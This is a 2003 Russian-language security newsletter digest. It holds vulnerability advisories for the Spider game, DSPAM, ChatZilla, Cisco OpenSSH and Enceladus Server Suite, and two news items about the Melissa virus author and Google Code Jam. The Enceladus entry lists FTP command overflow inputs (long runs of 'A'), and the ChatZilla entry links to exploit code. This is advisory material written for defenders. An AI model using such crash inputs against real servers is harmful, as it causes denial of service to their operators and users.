Программа: Spider Linux Game 1.1 Опасность: Средняя Наличие эксплоита: Нет Описание: Две уязвимости обнаружено в игре 'spider для Linux систем. Локальный пользователь может получить привилегии группы 'games'. Переполнение стекового буфера обнаружено в 'util.c' в функции remove_newlines(). Локальный пользователь может установить специально обработанное значение для HOME переменной среды, чтобы эксплуатировать переполнение буфера и выполнить произвольный код на уязвимой системе. Переполнение буфера обнаружено в 'vx_ui.c' в функции spider_defaults_objects_initialize(). Локальный пользователь может установить специально обработанное значение для OPENWINHOME или XVIEWHOME переменных окружения, чтобы вызвать переполнение буфера и выполнить произвольный код. Пример/Эксплоит: Нет URL производителя нет Решение: Установите следующий патч:--- util.c 1991-09-28 19:46:18.000000000 +0200 +++ util.patch 2003-09-14 18:34:00.000000000 +0200 @@ -168,7 +168,7 @@ extern char *getenv(); if (*str == '~') { /* user */ if (*(str + 1) == '/') { - (void)strcpy(newstr, getenv("HOME")); + (void)strncpy(newstr, getenv("HOME"), sizeof(newstr)); } else { char uname[20], *t; struct passwd *pwd; --- xv_ui.c 1991-09-28 19:46:46.000000000 +0200 +++ xv_ui.patch 2003-09-14 18:35:01.000000000 +0200 @@ -526,7 +526,7 @@ spider_defaults_objects_initialize(ip, o if (((helphome = getenv("OPENWINHOME")) || (helphome = getenv("XVIEWHOME"))) && (helphome != (char *)NULL)) { - sprintf(buf1,"%s/lib/help/spider",helphome); + snprintf(buf1,sizeof(buf1),"%s/lib/help/spider",helphome); if (helpfiles_exist(buf1)) { s = buf1; } |
Слабые разрешения в DSPAM
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: DSPAM version 2.6.5- 2.6.5.1
Опасность: Низкая
Наличие эксплоита: Нет
Описание: Уязвимость обнаружена в DSPAM. Локальный пользователь может получить поднятые привилегии на уязвимой системе.
Локальный пользователь, способный запускать программу DSPAM из командной строки, может получить поднятые привилегии на системе. Уязвимость связанна со слабыми разрешениями по умолчанию.
Пример/Эксплоит: Нет
URL производителя: http://www.nuclearelephant.com/projects/dspam/
Решение: Обновите до версии DSPAM 2.6.5.2 или DSPAM 2.7.0.beta.3.
18DoS против ChatZilla
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войныПрограмма: ChatZilla 0.8.23
Опасность:
Наличие эксплоита: Нет
Описание: Уязвимость обнаружена в ChatZilla. Злонамеренный сервер может аварийно завершить работу клиента.
Удаленный пользователь, выступающий в роли IRC сервера, может послать специально обработанный запрос, содержащий чрезмерно длинную строку (около 60 Кб) к подключенному клиенту, чтобы аварийно завершить работу клиента.
Пример/Эксплоит: http://www.securitylab.ru/_exploits/chatzilla.c.txt
URL производителя: http://www.mozilla.org/projects/rt-messaging/chatzilla/
Решение:
Способов устранения обнаруженной уязвимости не существует в настоящее время. Подключайтесь только к доверенным IRC серверам. 19OpenSSH уязвимость во множестве CISCO устройств
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: CiscoWorks 1105 for Wireless LAN Solution Engine, Cisco SN 5428 Storage Router, Cisco CATOS 7.x, Cisco CATOS 6.x, Cisco CATOS 5.x, Cisco 1105 for Hosting Solution Engine Опасность: Критическая Наличие эксплоита: Нет Описание: Несколько Cisco устройств уязвимы к OpenSSH "buffer_append_space()" переполнению буфера. Как сообщается, уязвимы следующие устройства: Cisco Catalyst Switching Software (CatOS) CiscoWorks 1105 Hosting Solution Engine (HSE) CiscoWorks 1105 Wireless LAN Solution Engine (WLSE) Cisco SN 5428 Storage RouterУязвимые версии: SN5428-2.5.1-K9 SN5428-3.2.1-K9 SN5428-3.2.2-K9 SN5428-3.3.1-K9 SN5428-3.3.2-K9 SN5428-2-3.3.1-K9 SN5428-2-3.3.2-K9Другие продукты Cisco, типа IOS, PIX, Catalyst 6000 Firewall Service Module, VPN3000 и VPN5000 не уязвимы. Пример/Эксплоит: Нет URL производителя:http://www.cisco.com Решение: Ограничьте доступ к SSH серверу только из доверенных источников. Установите соответствующие обновления, информацию о которых можно найти в источнике сообщения. |
Удаленный отказ в обслуживании против Enceladus Server Suite
18 сентября | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны
Программа: Enceladus Server Suite 4.0b Опасность: Средняя Наличие эксплоита: Да Описание: Несколько уязвимостей обнаружено в Enceladus Server Suite. Удаленный авторизованный пользователь (включая анонимного FTP пользователя) может аварийно завершить работу FTP сервера. Переполнение буфера обнаружено в нескольких FTP командах. Пример/Эксплоит: CWD 344 * A Stat 340 * A mkd 270 * A xmkd 270 * A rmd 270 * A nlst 340 * A URL производителя: http://www.mollensoft.com/product3.htm Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Используйте альтернативное программное обеспечение. |
Арестованный хакер "сдал" ФБР своих коллег по всему миру
18 сентября | Рубрика: Проблемные ситуации, информационная преступность, сетевые войныФБР завербовало хакера, распространившего в 1999 году компьютерный вирус Melissa. Агентству Associated Press стали доступны материалы суда, из которых следует, что американец Дэвид Смит был информатором ФБР в течение нескольких недель после его ареста в 1999 году. ФБР использовало подсудимого для выявления других компьютерных взломщиков по всему миру.
В частности, Смит выдал ФБР автора вируса «Анна Курникова», проживавшего в Нидерландах и позднее арестованного. Также Смит по требованию ФБР вошел в контакт с британским разработчиком вируса Gokar, который поражал операционные системы Microsoft. Кроме того, хакер раскрыл методы идентификации авторов рассылок электронных сообщений, пораженных вирусами.
В связи с оказанной помощью, прокурор в 2002 году снизил наказание Смиту до 20 месяцев содержания под стражей, тогда как по закону ему грозило наказание до 10 лет тюрьмы. В настоящее время хакер отбывает свой срок в тюрьме Форт-Дикса, штат Нью-Джерси. Сам он от комментариев по этому делу отказывается, сообщает Газета.Ru со ссылкой на AP.
22Google Code Jam 2003: докажи, что ты лучший!
18 сентября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. События, семинары, конференции, датыКонкурс продлится с 1 по 15 октября и предполагает массовую раздачу слонов победителям: от фирменных маек «Google Code Jam 2003» для пятисот кандидатов, пробившихся сквозь квалификационный отбор в первый тур, до десяти тысяч долларов для участника, занявшего первое место. Единственное условие – виртуозное владение одним из основных языков Сети: Java, C++, C# или VB.NET.
Соревнования будут проводиться непосредственно в онлайне по секундомеру, участникам придется решать одни и те же задачи в одних и тех же временных рамках. Выбор языка программирования – целиком и полностью на совести конкретного конкурсанта.
Для начала необходимо загрузить на свой компьютер Java-аплет TopCoder Competition Arena. Сделать это желательно до начала конкурса с тем, чтобы потом не тратить время на борьбу с интерфейсом и попытки понять, где же у него кнопка.
Участников конкурса разделят на группы по десять человек в каждой, разведут по виртуальным классам и выдадут им по три задачи с нарастающим уровнем сложности. После того, как таймер будет включен, претендент прочтет вводную, напишет решение задачи, скомпилирует и протестирует полученное решение, а затем отправит его жюри на предмет оценки.
На третьем этапе (так называемый Challenge Phase) участникам предстоит ознакомиться с кодом конкурента и попытаться «взломать» его, прогоняя через вражескую программу тестовые задачи в надежде, что рано или поздно программа повиснет от натуги. Соответственно, при успешном взломе «хакер» получит дополнительные очки, а автор сломанной программы – лишится части набранных. За несколько минут до окончания соревнований будет проведена автоматическая проверка написанного участниками кода с выявлением всех ошибок. Победит тот, у кого ошибок будет меньше.
23Эти и другие новости читайте на сайте Стра.тег
http://subscribe.ru/
E-mail: ask@subscribe.ru |
Отписаться
Убрать рекламу |
В избранное | ||